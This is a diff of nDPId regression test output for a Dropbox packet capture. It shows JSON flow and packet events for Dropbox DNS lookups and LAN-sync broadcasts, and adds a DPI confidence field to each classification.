 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1459182796786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"ts_msec":1459182796786,"pkt":"eJKcD6iO8IQvSpdgCABFAAE\/AABAAEARtPbAqAH+wKgBaQA12G8BK6cig5yBgAABAAMABAAEBmNsaWVudAdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAwAALBmNsaWVudAF2wBPAMAABAAEAAAAUAARsoKzMwDAAAQABAAAAFAAEbKCs7MA3AAIAAQAA9bUAGQducy0xOTI2CWF3c2Rucy00OAJjbwJ1awDANwACAAEAAPW1ABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwDcAAgABAAD1tQASBW5zLTU3CWF3c2Rucy0wN8AbwDcAAgABAAD1tQAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDArgABAAEAAkcJAATN+8A5wIwAAQABAAJG7wAEzfvDBcDMAAEAAQACRu8ABM37xPzAZwABAAEAAkbkAATN+8eG"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1459182798602,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1459182798602,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1459182798651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1459182798651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="}
 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1459182798781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"ts_msec":1459182798781,"pkt":"eJKcD6iO8IQvSpdgCABFAAEkAABAAEARtRHAqAH+wKgBaQA1v9gBEDDEI4aBgAABAAEABAAECWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAFAAENvCuH8AWAAIAAQABU2AAGQducy0xOTQ5CWF3c2Rucy01MQJjbwJ1awDAFgACAAEAAVNgABcHbnMtMTE2Mglhd3NkbnMtMTcDb3JnAMAWAAIAAQABU2AAFgZucy01NjQJYXdzZG5zLTA2A25ldADAFgACAAEAAVNgABMGbnMtMzE1CWF3c2Rucy0zOcAewK0AAQABAAIhDwAEzfvBO8CLAAEAAQABU1QABM37wjQHTlMtMTE2MsBwAAEAAQABU10ABM37xIrAQwABAAEAAVNaAATN+8ed"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}}
 00806{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1459182798820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"ts_msec":1459182798820,"pkt":"eJKcD6iO8IQvSpdgCABFAAE1AABAAEARtQDAqAH+wKgBaQA1xmUBIb321e+BgAABAAMABAAEAWQHZHJvcGJveANjb20AAAEAAcAMAAUAAQAAAQsABgFkAXbADsArAAEAAQAAAC0ABGygrOHAKwABAAEAAAAtAARsoKzBwC0AAgABAAD1swAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDALQACAAEAAPWzABIFbnMtNTcJYXdzZG5zLTA3wBbALQACAAEAAPWzABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwC0AAgABAAD1swAZB25zLTE5MjYJYXdzZG5zLTQ4AmNvAnVrAMCAAAEAAQACRwcABM37wDnAngABAAEAAkbtAATN+8MFwF0AAQABAAJG7QAEzfvE\/MDAAAEAAQACRuIABM37x4Y="}
-00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}}
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1459182816605,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1459182816605,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1459182816605,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3RAAEARdoHAqAFpwKgB\/o1NADUALO8im6YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAHAAB"}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
